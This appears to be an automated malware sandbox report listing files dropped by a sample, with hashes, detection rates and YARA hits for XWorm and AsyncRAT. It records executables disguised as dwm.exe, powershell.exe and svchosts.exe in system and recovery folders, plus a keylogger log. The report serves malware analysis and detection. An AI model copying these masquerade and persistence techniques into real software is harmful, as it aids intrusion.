File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchosts.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.050013373778756
Encrypted:	false
SSDEEP:	3:I5XsGXR52afdAHn:I9RnE
MD5:	78DD1DB923645314CFD8F7ECB5394E3D
SHA1:	4C4379B4A63A4932E676D49A0914E3E8F55EE938
SHA-256:	D081581275BB5B7830C1D6C4795A8C8CB65C1BDBB16C4A8206727565E1951622
SHA-512:	A7A9CB1B9DE9E349EFE38B5B0DBDFCEDF40BD2EE345DA641EAA67686C1C9F8E64F89FDB10BF588992A6CA42F52EB8DB68D8E5C4B8CCE78A4A8BFD938523FC23C
Malicious:	true
Preview:	"C:\Brokercrt\comReviewsession.exe"

C:\Program Files (x86)\jDownloader\18607e77f76bf7

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	5.094482506519422
Encrypted:	false
SSDEEP:	3:upzKzZ6JbRTT:upmzZ6r
MD5:	CBDA4E52061DB3DC50FBBE0346A93B62
SHA1:	FA930972A45CFE272709AB663A165AF2B6E6EEA1
SHA-256:	E1C1E44D7734FA55A930D94CC0007CFCC8987CC09529E58E185884956325AF08
SHA-512:	6D3C3DD5E26D12CF819473FADE0F8FCB3DEFDBA592BA8320DB097B77633FF065498D6400DABD6467703DF48445B1CE1CB1B4637A0272488FDE8F765C74F45AC0
Malicious:	false
Preview:	3FeruLV9oQqUXZ3tDclVlFNFp54lHljKQcOomxi323fk8ngTAbV6

C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Lang\18607e77f76bf7

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.787555171427131
Encrypted:	false
SSDEEP:	6:WYjxSD24eL63HZi0/MXUCZW0RQ8DK62/2zYS8AnNRzwl+gj1o:yDFeLWX0EqlW9+NRn
MD5:	F4AB5421948633684C129DF7FBB0CCF1
SHA1:	E57352DB87F013CB0D796F22E5E10B3712D10261
SHA-256:	99D9E89FCDD839B5B587CF0F266AB1321BE55948EF4DD10A2D0497C22DC99DD9
SHA-512:	4C1015EB843D8EAD40954DB119F695A58606B2D270C7ED7C0BCA28C1514156DE1D99FF53DB714449F71568E21301AC87B6815F17BC6B192A64F8CF4952C85E21
Malicious:	false
Preview:	rEFVpPB1ojMPoS5ARHtLkepgL7QvLVKhAot3vw9YpFCcj2qzkQf4MtrNZjKr8PpTZpO9iBPeIVgfcN6SRbK5zQUR7geLmRZZasD4oqQjBAw1NMvMm1ahFueIU7CCgD206GFtJCokKl3yedEvvRju01UpN4kqoOC7H55GHBCkMzXd0po03QQPeIAEwZgPc765i6qji7ouO9hBe0yhPtxX8wd940TrfxIP2b549FS5mgAfk9k6k89sJj7vcqorn6Pb0SIC54iKa2ubw8Z5QXHgxZFTeJbSblRqRjoS0iBqZ

C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Security\BrowserCore\en-US\6cb0b6c459d5d3

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with very long lines (588), with no line terminators
Category:	dropped
Size (bytes):	588
Entropy (8bit):	5.870890544208266
Encrypted:	false
SSDEEP:	12:QhcS9jJCAFmJejAP8/41kxq8STdLG3y4kxH+chB:Q39jePE/4q56GC4XQ
MD5:	128EAEFEC8AFA70E0E8F508AF3649D5F
SHA1:	7BBE643795ECA13010C64669B2BE26F240BC1D58
SHA-256:	81FAE81BC299D2E0C4B39BE83EDA755999D77E85DE9BF69D4CB51943EADE626A
SHA-512:	04EFF503980CF8EA9904F60E00D0E6ECF2BEAEE690F96C74579CCDBCA56E3E8127462FD785279D697371D93BAA552BD9AD3E85E9012407279CB9686FF5218A03
Malicious:	false
Preview:	Zx5T9McxHi3X0AsfzStgNKhf2V57SDuyoJBIOM8dQyQ68ujXCquhApWOPaaoRffEyFtq8kRnTQPZ4kgIvh4lTMx8wx2xwULvTMI3B2ZcZHOtZ6Up3R2tk3umRu4Lrd09EeGscnH3IcML7DjzcN3ebcKZbfmR8Nu5QPp50mMQK9lIrjoNLEsejVhmTqQ6Bz44sQ4sYn90AnUb0Cs20YF4ePV5rCmJVQPUFqaao6yhE2e6BGvQ8YFmtAac49BWA0fuX9WKmRN4kizmvZ4lQWL6KnkFQ8go5chOXujBtlnqLLCLKxqfFZFopijuZR3ovj9IBlPBz31osev9lY4cRBjfW2jyKzlcr95lL4KjiopMia5KxjJAWbWuAdvIBa0ARZ6tiJxrNV4nVW756YAlplGQmLlsIChHxo5JdMmnvcwAhtYngzMnZPVpSqHXiFiLywzrbxbuwXzNyGt2x7LT03rhTP0xEOFp3kLu4rLtXb0CZH0M6Pjk4PV4ERXM6ophRJTN487Gwc5YDpHMYo0zofvoPQqmT9wtwTvPxmR8RdycU61ZJLxSxz2wYp8oSUwwqLlt32YvW2hLrSUS

C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\e978f868350d50

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.747291505091143
Encrypted:	false
SSDEEP:	6:Rde/risjsfP4Zdl+rVjGB7IMZx1BUAFl1tR1VrODnoZsEn:STisj6wX0NGJDCAttVMsn
MD5:	1492B001D84151F392B45454EA6658D0
SHA1:	00F77B8E4F25A28DF82AAC6ECC95CF1DF247A598
SHA-256:	342936D1841F70102C00324133866F0C1D4EFA3D5BB98810FBD2C1FF4E28EF6C
SHA-512:	B2E014663288132A27F52D836E6E0992A01C9EB19D3D6FFF55097CE4ACF8CCE5C0F3637330558142A8DA565904ABD589C0B851CC08E6DFA2E4B456602FAC4F04
Malicious:	false
Preview:	sbQzsobMzivcQtykDKMTHFsWaH8Gyd8J7AsKA1i4MFB9PNJFdqvUwKKms4YkqUXVjmfPAojMlRHBEsHM72nHsnWw0GbGc8O1rpZms4FzGisfDIiAwLnxrPn6PtY4McunDPUYSeeDxyBJ41srhbTQUaKbCdW9fKmnyFbyyKrSrkA3OeBYAqXvIdTmE2WzHehmLXUzZ43WtBiuZRMhb89yx0fVvzt6y2LNCYr1JM8FxACH4jMxpyXIfsyV29DkK7i00VrBkVXP93BxyXaMm6Q9fCrUkV9KIY40cM

C:\Recovery\powershell.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\18607e77f76bf7

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with very long lines (375), with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.780877147142174
Encrypted:	false
SSDEEP:	6:Tso8CTSAy1qxCazlIL14T35/BmdqfWEq5XrhLpKnFbKyYvlhXCSU7ktgn:odFAmqQElIREJ2OWN5XVLgFu/aSyktgn
MD5:	AA0B46909FCEAAE28DC52DEA04174463
SHA1:	379B503C574DA8E4C84BFCA799A487EA77421D6A
SHA-256:	35EE43B1EAD9EC43D7FBD49DDA4166CA1EEADE9DFF223F76085DCC060629F468
SHA-512:	94584876FCDD3312E37DF1F84BF12030DF6709C5862086A6DE27DC83603B572962E430A574938CC8B3B1CC0AADD77719EDB5CF522AB33A31E4FA71BA44507541
Malicious:	false
Preview:	tBaiDMdU7A9X7rVzu0G7mS8VJzrokMlxuU8GoZPxvcGUgejry7xYy7uaDFZOeytuYLnntPLVlSLJMozoPA0mZM9wjhDjAAS6sV5U058jvcxfvkOYQu8e8GVMM0DLLmUkAPb0texUCR06ZdA8SpSQBy8l9tHA1wXJHMfgJXov6ocqPZwt0F3gTEjLRz1AWxcP4ryN8ey4AhUXWRWj6YJw20zDnTPUgoZILMwhkjuVQ9gwtLzAdSD7nqXD2ujoPdYVILMKey8Xoxf2UCUbeP1Nlbefytp09FGwlKoh9ofpTqT0KetzaHK9mKuqrrVuIIXirsRJYwcztM44IoUU9zZ25GKbZ70STugLSuIcNjbopVQZPziDWAvTsfn

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\comReviewsession.exe.log

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	954
Entropy (8bit):	5.350970057955659
Encrypted:	false
SSDEEP:	24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
MD5:	3CE64235B0821B76294C3AD95F117E6C
SHA1:	FD1EC471493CE132D0D719A9771739912BEF91BF
SHA-256:	C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
SHA-512:	DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Built.exe

Download File

Process:	C:\Users\user\Desktop\Vjy8d2EoqK.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7170862
Entropy (8bit):	7.992169536232509
Encrypted:	true
SSDEEP:	98304:0pzdbM+Q2y+aq02EPzxjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbiEJ1nL2hBne:0Df07JOjmFQR4MVGFtwLPsnL2hVe
MD5:	EC729E4911261337E4CA4E9FC77F942B
SHA1:	1ACAA74A2BCCF387317F940EA7DC3D27AE9924F0
SHA-256:	AD0FDA5BDC874CBBDDDB9EBB051D4E2B190CA8558438D9E7CCBE5ED5C8249DF3
SHA-512:	1F2450E10A10A79513D9291E273F922DD60764DDBA15749439AB71DEDE6C5F4E328D0C8F1E96B6245E6B8D02280B9818E368F6FF40C7C491A1DAF64723EEF267
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....R.f.........."....(.....l.................@....................................<.n...`.................................................l...x.......\....`..."..~Am..)......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...\...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	123
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrN2VjFYJKXzovuEXNrNrN2VjFYJKXzovuEXn:EFYJKDoWrcBKFYJKDoG+BBKFYJKDoG+n
MD5:	358CA013D20F31391BB744A507ADD2F1
SHA1:	E59D82B6D42A501549AE0318960BC35ED8F35C18
SHA-256:	673F4C3E567D54C499CED26C920FAE60B48884BAB9C82E759A41C280BE27DBAB
SHA-512:	8358B313ACA0A9B8A263ED8364FFDBC97EB966D78EB03E4759B03EA31B564350F00CE5C6232A2B7E69EBC408C1CD36751D52DF912568F1F0EBB6D126535B9076
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r[WIN]....### explorer ###..r[WIN]r[WIN]r[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\OgMwMWeWPS

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601647
Encrypted:	false
SSDEEP:	3:+sWSOpW6kn:+sVGbk
MD5:	C8C4BDF458CB1CA0A42DB5ACF23DA34C
SHA1:	A33B9672A30113D00F760C509197FBD0884F889E
SHA-256:	55FB2CDA39C14D7946CA55E904388473B3C851004AC7B8E306851EFD22EB7C52
SHA-512:	5AEA5F57975FA7500397478EA3871C5AADB48B95DE7D8C2F671CB1EB3B3E4880028C074A18048122A1BDA9BE4F633EDDD1804D8F113FACF3E3E385D935E49E8E
Malicious:	false
Preview:	fNz1ZzUdQJwUTwq503L3TYwTB

C:\Users\user\AppData\Local\Temp\S l r .exe

Download File

Process:	C:\Users\user\Desktop\Vjy8d2EoqK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	5.765122972138846
Encrypted:	false
SSDEEP:	1536:4BDBCSePghTBz+uO9S+bUwga3HX6l+OZ1aSCEmiEG:4BDcgh1zF+bUiHlOZ1lCEmZG
MD5:	D69B290766342861CDE3B24BA1ECD0C6
SHA1:	FB3460CAD777706956AD5FC48FE5CEDA237B68E8
SHA-256:	4F294703285551743AB59B1092CCC0D7182A6458ACD53ED09CEB06CEACB03622
SHA-512:	C5ACD87419A6603C470884147186D4D0F5DAA02704731ED42A1B43E44C1F35814178DE614C55DCBF2126F0AC608B13E2F0834F18F537324A256DE10AA8EFF8F5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................. .......0....@..............................................@...........................P...............................................................p......................................................CODE................................ ..`DATA....\|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc................"..............@..P.....................$..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\S l r .exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.677524556734161
Encrypted:	false
